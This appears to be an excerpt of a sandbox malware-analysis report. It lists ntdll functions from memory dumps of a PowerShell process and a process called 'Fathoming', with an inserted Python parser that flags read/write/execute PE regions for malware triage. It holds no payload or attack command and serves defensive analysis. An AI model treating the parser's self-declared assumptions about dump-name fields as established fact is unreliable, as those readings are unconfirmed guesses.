                                          • Instruction Fuzzy Hash: 01117B33B04205DBDF25966998512EAF3A1BBD5126F24803FCF96CB383DA72C5068793
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2661050678.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_8e30000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 05c565b39d123dd02c432abff7b3f384b5bc018ac4ee106a8ff74c4f1018d228
                                          • Instruction ID: 01cee2016e48c6a3031f45b290b7b7327e91ebd4dc978fbd4c1ece3dfa30e1ec
                                          • Opcode Fuzzy Hash: 05c565b39d123dd02c432abff7b3f384b5bc018ac4ee106a8ff74c4f1018d228
                                          • Instruction Fuzzy Hash: 4BF0E934E043449FCB01D7E9E844AED7F75FF81260F4041E9D0019B2A2D7655E09C792
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2661050678.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_8e30000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fda32ad06733a65c5e6cbaaf3386ff53eb483cb6c372d977fe7abbfa34456519
                                          • Instruction ID: 25acfa6b6fd1ed8dead9db7aefd362197660a952d111b3935b659eb96fe187f9
                                          • Opcode Fuzzy Hash: fda32ad06733a65c5e6cbaaf3386ff53eb483cb6c372d977fe7abbfa34456519
                                          • Instruction Fuzzy Hash: 40F01775A01215AFDB05CB88D890EFEF376FF88324F208158EA15A72A0C732EC52CB50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: l$l$l$l
                                          • API String ID: 0-2658161240
                                          • Opcode ID: 29849fbe435c79052e84a7585a95766184c1c9ffa151c471e26aa22ac06ca312
                                          • Instruction ID: 9b7adeb73710701c6e88ce6d50c010851558e878ff269fc4bf6b5086ea72612e
                                          • Opcode Fuzzy Hash: 29849fbe435c79052e84a7585a95766184c1c9ffa151c471e26aa22ac06ca312
                                          • Instruction Fuzzy Hash: C0F16A32F042149FDBA4CB6AD8217EABBB2AFC2610F24907AD445CB341DA71CD45CBE1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: tLk$tLk$x.k$-k
                                          • API String ID: 0-1623445408
                                          • Opcode ID: 800aa9fa1060691628cc52e9f8e52b0310a474634beb50b0cd3f47ec44ddd827
                                          • Instruction ID: a665c6a33863885277edfcc067d56c28e1cf6a0af54129ad36c7209d6e32d38f
                                          • Opcode Fuzzy Hash: 800aa9fa1060691628cc52e9f8e52b0310a474634beb50b0cd3f47ec44ddd827
                                          • Instruction Fuzzy Hash: FF226F74E402289FDB64DB14C855BDAB7B2FF89304F109599D80AAB341CB76EE81CF91

                                          Execution Graph

                                          Execution Coverage:0%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:100%
                                          Total number of Nodes:1
                                          Total number of Limit Nodes:0
                                          execution_graph 81692 21b22b60 LdrInitializeThunk

                                          Control-flow Graph

                                          control_flow_graph 0 21b22b60-21b22b6c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 84cd28db4e4a81d60ef996d468d3e42d6afbb7cd976676a36f1254649a4accc4
                                          • Instruction ID: 7bfe834ffd48abf73826db9dcb54aade552c2de986204de7caf1d1461b6ebf53
                                          • Opcode Fuzzy Hash: 84cd28db4e4a81d60ef996d468d3e42d6afbb7cd976676a36f1254649a4accc4
                                          • Instruction Fuzzy Hash: CF900261202400034509B1584454616502A57E0201B55C131E5018551DC52589A27226
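
Every function in this listing is described by the same record: a "Memory Dump Source" header, the .sdmp file the code was disassembled from (whose dotted fields carry the process index, dump index and region base), the snapshot file, and the API, string and opcode identifiers. The parser below is an added example written for this page, not code from Joe Sandbox or its IDA plugin. Its input is two records abridged from this listing; reading the fifth dotted field of the dump name as the region's protection value (0x40 = PAGE_EXECUTE_READWRITE) and the snapshot file suffix as the process image name are assumptions, marked as such in the code. It groups functions by memory region and flags PE-structured regions that are entirely read/write/execute, which is not how the loader maps a legitimate image and therefore the first place to dump when hunting for unpacked or manually mapped code.

```python
import re
from dataclasses import dataclass

# Assumption: the fifth dotted field of a .sdmp name is the region's Protect
# value as in MEMORY_BASIC_INFORMATION, so 0x40 means PAGE_EXECUTE_READWRITE.
PAGE_EXECUTE_READWRITE = 0x40

# Sample input, abridged from two records in this report: a PowerShell heap
# region in process 2 and the PE-structured region at 0x21AB0000 in process 8.
# One line keeps the "Download File" link text that the HTML export glues on.
SAMPLE_RECORDS = """\
Memory Dump Source
• Source File: 00000002.00000002.2643865329.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6fb0000_powershell.jbxd
Similarity
• API ID:
• String ID: l$l$l$l
• API String ID: 0-2658161240
• Opcode ID: 29849fbe435c79052e84a7585a95766184c1c9ffa151c471e26aa22ac06ca312
• Instruction ID: 9b7adeb73710701c6e88ce6d50c010851558e878ff269fc4bf6b5086ea72612e
Memory Dump Source
• Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
• Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 84cd28db4e4a81d60ef996d468d3e42d6afbb7cd976676a36f1254649a4accc4
• Instruction ID: 7bfe834ffd48abf73826db9dcb54aade552c2de986204de7caf1d1461b6ebf53
"""

FIELD_RE = re.compile(r"^\u2022\s*([^:]+):\s*(.*)$")  # "• Key: value"
SOURCE_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.\d+\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})(?:\.[0-9A-Fa-f]{8}){3}"
    r"\.sdmp,\s*Offset:\s*[0-9A-Fa-f]+,\s*based on PE:\s*(?P<pe>true|false)$"
)
# Assumption: snapshot names are hcaresult_<proc>_<dump>_<base>_<image>.jbxd.
SNAPSHOT_RE = re.compile(r"^hcaresult_\d+_\d+_[0-9A-Fa-f]+_(?P<image>.+)\.jbxd$")


@dataclass(frozen=True)
class Function:
    proc: int          # analysis-local process index (first dotted field)
    base: int          # base address of the dumped region
    based_on_pe: bool  # the sandbox found a PE header at the region base
    protect: int       # assumed region protection, see PAGE_EXECUTE_READWRITE
    image: str         # process image name taken from the snapshot file name
    api_ids: tuple     # "$"-separated API names the function references
    string_ids: tuple  # "$"-separated strings the function references
    opcode_id: str
    instruction_id: str


def _ids(value):
    return tuple(value.split("$")) if value else ()


def parse_records(text):
    """Split the listing at each 'Memory Dump Source' header, keep its bullet fields."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = {}
            records.append(current)
            continue
        m = FIELD_RE.match(line)
        if current is not None and m:
            # Strip the "Download File" link text the HTML export appends to dump names.
            value = m.group(2).replace("Download File", "").strip()
            current.setdefault(m.group(1).strip(), []).append(value)
    return [_to_function(r) for r in records]


def _to_function(rec):
    def first(key):
        return rec.get(key, [""])[0]
    src = SOURCE_RE.match(first("Source File"))
    if src is None:
        raise ValueError("unrecognised Source File: %r" % first("Source File"))
    snap = SNAPSHOT_RE.match(first("Snapshot File"))
    return Function(
        proc=int(src["proc"], 16), base=int(src["base"], 16),
        based_on_pe=src["pe"] == "true", protect=int(src["protect"], 16),
        image=snap["image"] if snap else "",
        api_ids=_ids(first("API ID")), string_ids=_ids(first("String ID")),
        opcode_id=first("Opcode ID"), instruction_id=first("Instruction ID"),
    )


def summarize(functions):
    """Group functions by (process, region base): image, flags, count and APIs seen."""
    regions = {}
    for f in functions:
        r = regions.setdefault((f.proc, f.base), {
            "image": f.image, "based_on_pe": f.based_on_pe,
            "protect": f.protect, "functions": 0, "apis": set()})
        r["functions"] += 1
        r["apis"].update(f.api_ids)
    return regions


def rwx_pe_regions(functions):
    """PE-structured regions whose (assumed) protection is PAGE_EXECUTE_READWRITE.

    The loader maps image code read/execute, so a PE header inside an RWX
    region points at a manually mapped or unpacked image: dump those first."""
    return sorted({(f.proc, f.base) for f in functions
                   if f.based_on_pe and f.protect == PAGE_EXECUTE_READWRITE})


if __name__ == "__main__":
    fns = parse_records(SAMPLE_RECORDS)
    for (proc, base), r in sorted(summarize(fns).items()):
        print("proc %d %-12s base 0x%X pe=%-5s protect=0x%02X functions=%d apis=%s"
              % (proc, r["image"], base, r["based_on_pe"], r["protect"],
                 r["functions"], sorted(r["apis"])))
    print("RWX PE regions:", ["%d:0x%X" % pb for pb in rwx_pe_regions(fns)])
```

Feed the whole "Memory Dump Source" listing of a report to parse_records and the summary gives, per process, which regions the functions came from and which APIs each region touches; the region list is the natural starting point for pulling the matching .sdmp files and comparing any PE-structured one against its on-disk counterpart.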

                                          Control-flow Graph

                                          control_flow_graph 2 21b22df0-21b22dfc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: aebdf2431bba8268bfda3c16133cc24c3545cb612f0cb9678b2bc2ecd5f30dcd
                                          • Instruction ID: 374d22d527e165417f3a28df899881f987a0d372977715b4e3f8249a96008caa
                                          • Opcode Fuzzy Hash: aebdf2431bba8268bfda3c16133cc24c3545cb612f0cb9678b2bc2ecd5f30dcd
                                          • Instruction Fuzzy Hash: 6D90023120140413D515B1584544707102957D0241F95C522A4428519DD6568A63B222

                                          Control-flow Graph

                                          control_flow_graph 1 21b22c70-21b22c7c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a3c6e857e3d56102070efd76a0b907c65401227b5feb038b310a9f8a6f21844f
                                          • Instruction ID: 528bd98864ef38da91941e7cde735d180a6ecabfc3e5e0f4c9aee5be674a7405
                                          • Opcode Fuzzy Hash: a3c6e857e3d56102070efd76a0b907c65401227b5feb038b310a9f8a6f21844f
                                          • Instruction Fuzzy Hash: 1090023120148802D514B158844474A102557D0301F59C521A8428619DC69589A27222

                                          Control-flow Graph

                                          control_flow_graph 3 21b235c0-21b235cc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 041a64560911cf89de0e1bc4026c0ba983cffd716200471f2e4147a98ce77a88
                                          • Instruction ID: fe6fe49a114eb9166936bb3a159849ae1fc85fdd431523bf43c819adfa31550b
                                          • Opcode Fuzzy Hash: 041a64560911cf89de0e1bc4026c0ba983cffd716200471f2e4147a98ce77a88
                                          • Instruction Fuzzy Hash: 9A90023160550402D504B1584554706202557D0201F65C521A4428529DC7958A6276A3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2160512332
                                          • Opcode ID: bbc5ecf08176fcde295854b49d73d27b46c4d123aebabd4aa0d51d8dc025dc8d
                                          • Instruction ID: 54f9d8db1546ae76d07569cf7d7a18bc77d329d0b3d016826bcf0b0eb04194fc
                                          • Opcode Fuzzy Hash: bbc5ecf08176fcde295854b49d73d27b46c4d123aebabd4aa0d51d8dc025dc8d
                                          • Instruction Fuzzy Hash: 77927A71A04782AFE729CE14C880B5BB7F8FBA9750F00496DFA98D7260D774D844CB92

                                          Control-flow Graph

                                          control_flow_graph 1075 21b18620-21b18681 1076 21b55297-21b5529d 1075->1076 1077 21b18687-21b18698 1075->1077 1076->1077 1078 21b552a3-21b552b0 GetPEB 1076->1078 1078->1077 1079 21b552b6-21b552b9 1078->1079 1080 21b552d6-21b552fc call 21b22ce0 1079->1080 1081 21b552bb-21b552c5 1079->1081 1080->1077 1086 21b55302-21b55306 1080->1086 1081->1077 1082 21b552cb-21b552d4 1081->1082 1084 21b5532d-21b55341 call 21ae54a0 1082->1084 1091 21b55347-21b55353 1084->1091 1086->1077 1088 21b5530c-21b55321 call 21b22ce0 1086->1088 1088->1077 1097 21b55327 1088->1097 1092 21b5555c-21b55568 call 21b5556d 1091->1092 1093 21b55359-21b5536d 1091->1093 1092->1077 1095 21b5536f 1093->1095 1096 21b5538b-21b55401 1093->1096 1100 21b55371-21b55378 1095->1100 1103 21b55403-21b55435 call 21adfd50 1096->1103 1104 21b5543a-21b5543d 1096->1104 1097->1084 1100->1096 1102 21b5537a-21b5537c 1100->1102 1105 21b55383-21b55385 1102->1105 1106 21b5537e-21b55381 1102->1106 1115 21b5554d-21b55552 call 21b6a4b0 1103->1115 1108 21b55514-21b55517 1104->1108 1109 21b55443-21b55494 1104->1109 1105->1096 1110 21b55555-21b55557 1105->1110 1106->1100 1108->1110 1111 21b55519-21b55548 call 21adfd50 1108->1111 1116 21b55496-21b554cc call 21adfd50 1109->1116 1117 21b554ce-21b55512 call 21adfd50 * 2 1109->1117 1110->1091 1111->1115 1115->1110 1116->1115 1117->1115
                                          Strings
                                          • corrupted critical section, xrefs: 21B554C2
                                          • Thread identifier, xrefs: 21B5553A
                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 21B554CE
                                          • double initialized or corrupted critical section, xrefs: 21B55508
                                          • Thread is in a state in which it cannot own a critical section, xrefs: 21B55543
                                          • Critical section debug info address, xrefs: 21B5541F, 21B5552E
                                          • undeleted critical section in freed memory, xrefs: 21B5542B
                                          • Invalid debug info address of this critical section, xrefs: 21B554B6
                                          • Critical section address., xrefs: 21B55502
                                          • Address of the debug info found in the active list., xrefs: 21B554AE, 21B554FA
                                          • 8, xrefs: 21B552E3
                                          • Critical section address, xrefs: 21B55425, 21B554BC, 21B55534
                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 21B554E2
                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 21B5540A, 21B55496, 21B55519
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                          • API String ID: 0-2368682639
                                          • Opcode ID: 794100a663e20d76fb0c978e36bdb51e459b74a95a1e6952b7bba2c0812f4e24
                                          • Instruction ID: 4ff11ddfa880847c06331e79e0d2668bb9133182c244b8e161a6ec4abaa16cb6
                                          • Opcode Fuzzy Hash: 794100a663e20d76fb0c978e36bdb51e459b74a95a1e6952b7bba2c0812f4e24
                                          • Instruction Fuzzy Hash: 6881BAB1A00248FFDB58CF95C980F9EBBB9FB09714F204129F508B7295D335A945CBA0

                                          Control-flow Graph

                                          control_flow_graph 1298 21b90274-21b90296 call 21b37e54 1301 21b90298-21b902b0 RtlDebugPrintTimes 1298->1301 1302 21b902b5-21b902cd call 21ad76b2 1298->1302 1306 21b90751-21b90760 1301->1306 1307 21b902d3-21b902e9 1302->1307 1308 21b906f7 1302->1308 1310 21b902eb-21b902ee 1307->1310 1311 21b902f0-21b902f2 1307->1311 1309 21b906fa-21b9074e call 21b90766 1308->1309 1309->1306 1313 21b902f3-21b9030a 1310->1313 1311->1313 1315 21b906b1-21b906ba GetPEB 1313->1315 1316 21b90310-21b90313 1313->1316 1318 21b906d9-21b906de call 21adb970 1315->1318 1319 21b906bc-21b906d7 GetPEB call 21adb970 1315->1319 1316->1315 1320 21b90319-21b90322 1316->1320 1328 21b906e3-21b906f4 call 21adb970 1318->1328 1319->1328 1321 21b9033e-21b90351 call 21b90cb5 1320->1321 1322 21b90324-21b9033b call 21aeffb0 1320->1322 1332 21b9035c-21b90370 call 21ad758f 1321->1332 1333 21b90353-21b9035a 1321->1333 1322->1321 1328->1308 1337 21b905a2-21b905a7 1332->1337 1338 21b90376-21b90382 GetPEB 1332->1338 1333->1332 1337->1309 1341 21b905ad-21b905b9 GetPEB 1337->1341 1339 21b903f0-21b903fb 1338->1339 1340 21b90384-21b90387 1338->1340 1342 21b904e8-21b904fa call 21af27f0 1339->1342 1343 21b90401-21b90408 1339->1343 1344 21b90389-21b903a4 GetPEB call 21adb970 1340->1344 1345 21b903a6-21b903ab call 21adb970 1340->1345 1346 21b905bb-21b905be 1341->1346 1347 21b90627-21b90632 1341->1347 1366 21b90590-21b9059d call 21b911a4 call 21b90cb5 1342->1366 1367 21b90500-21b90507 1342->1367 1343->1342 1350 21b9040e-21b90417 1343->1350 1356 21b903b0-21b903d1 call 21adb970 GetPEB 1344->1356 1345->1356 1353 21b905dd-21b905e2 call 21adb970 1346->1353 1354 21b905c0-21b905db GetPEB call 21adb970 1346->1354 1347->1309 1351 21b90638-21b90643 1347->1351 1359 21b90419-21b90429 1350->1359 1360 21b90438-21b9043c 1350->1360 1351->1309 1361 21b90649-21b90654 1351->1361 1365 21b905e7-21b905fb call 21adb970 1353->1365 1354->1365 1356->1342 1385 21b903d7-21b903eb 1356->1385 1359->1360 1368 21b9042b-21b90435 call 21b9dac6 1359->1368 1370 21b9044e-21b90454 1360->1370 1371 21b9043e-21b9044c call 21b13bc9 1360->1371 1361->1309 1369 21b9065a-21b90663 GetPEB 1361->1369 1396 21b905fe-21b90608 GetPEB 1365->1396 1366->1337 1375 21b90509-21b90510 1367->1375 1376 21b90512-21b9051a 1367->1376 1368->1360 1379 21b90682-21b90687 call 21adb970 1369->1379 1380 21b90665-21b90680 GetPEB call 21adb970 1369->1380 1372 21b90457-21b90460 1370->1372 1371->1372 1383 21b90472-21b90475 1372->1383 1384 21b90462-21b90470 1372->1384 1375->1376 1387 21b90538-21b9053c 1376->1387 1388 21b9051c-21b9052c 1376->1388 1393 21b9068c-21b906ac call 21b886ba call 21adb970 1379->1393 1380->1393 1394 21b904e5 1383->1394 1395 21b90477-21b9047e 1383->1395 1384->1383 1385->1342 1399 21b9056c-21b90572 1387->1399 1400 21b9053e-21b90551 call 21b13bc9 1387->1400 1388->1387 1397 21b9052e-21b90533 call 21b9dac6 1388->1397 1393->1396 1394->1342 1395->1394 1403 21b90480-21b9048b 1395->1403 1396->1309 1405 21b9060e-21b90622 1396->1405 1397->1387 1404 21b90575-21b9057c 1399->1404 1412 21b90563 1400->1412 1413 21b90553-21b90561 call 21b0fe99 1400->1413 1403->1394 1409 21b9048d-21b90496 GetPEB 1403->1409 1404->1366 1410 21b9057e-21b9058e 1404->1410 1405->1309 1415 21b90498-21b904b3 GetPEB call 21adb970 1409->1415 1416 21b904b5-21b904ba call 21adb970 1409->1416 1410->1366 1418 21b90566-21b9056a 1412->1418 1413->1418 1424 21b904bf-21b904dd call 21b886ba call 21adb970 1415->1424 1416->1424 1418->1404 1424->1394
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                          • API String ID: 3446177414-1700792311
                                          • Opcode ID: 9dd0703de8c0154c8feab8616489200f8f43ddc12e1ad88a3cc61258fb7f59c1
                                          • Instruction ID: 2e88feb7142824f1fcfa369735be55777af1465492d4473d2742205096c0fb46
                                          • Opcode Fuzzy Hash: 9dd0703de8c0154c8feab8616489200f8f43ddc12e1ad88a3cc61258fb7f59c1
                                          • Instruction Fuzzy Hash: 5FD10036601682DFDB1ACF64C490AAEBBF9FF5A310F14806DE5459B662C734DA82CF50
                                          Strings
                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 21B525EB
                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 21B52412
                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 21B5261F
                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 21B52498
                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 21B52506
                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 21B52602
                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 21B522E4
                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 21B524C0
                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 21B52624
                                          • @, xrefs: 21B5259B
                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 21B52409
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                          • API String ID: 0-4009184096
                                          • Opcode ID: d1d97d037a480075c424ca954eddf37f2b395ef85b407f4e5b8b4b0a15bf7a32
                                          • Instruction ID: aa794f5e0589e7b3a9339ffb056abf4ea011453abfe1e97167535fe4702f2b07
                                          • Opcode Fuzzy Hash: d1d97d037a480075c424ca954eddf37f2b395ef85b407f4e5b8b4b0a15bf7a32
                                          • Instruction Fuzzy Hash: 2C027FF1D01269AFDB65CB54CD80B9AB7B8AF55304F0141EAE708A7251EB309F84CF69
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimeuserer.exe$services.exe$smss.exe$svchost.exe
                                          • API String ID: 0-2515994595
                                          • Opcode ID: b832fc7cc739fd49076c51985994ae5403cb8393b3fd73332be090bb1631724b
                                          • Instruction ID: 6d99d4c7fd111e2c4ea94317deb0870dd8b70b16bfa7724138f4c840e8946c9c
                                          • Opcode Fuzzy Hash: b832fc7cc739fd49076c51985994ae5403cb8393b3fd73332be090bb1631724b
                                          • Instruction Fuzzy Hash: 4B51D2715043419BCB2ACF548980B9BBBFCFFA9B50F114A2DE958C3295E770C644CB92
                                          APIs
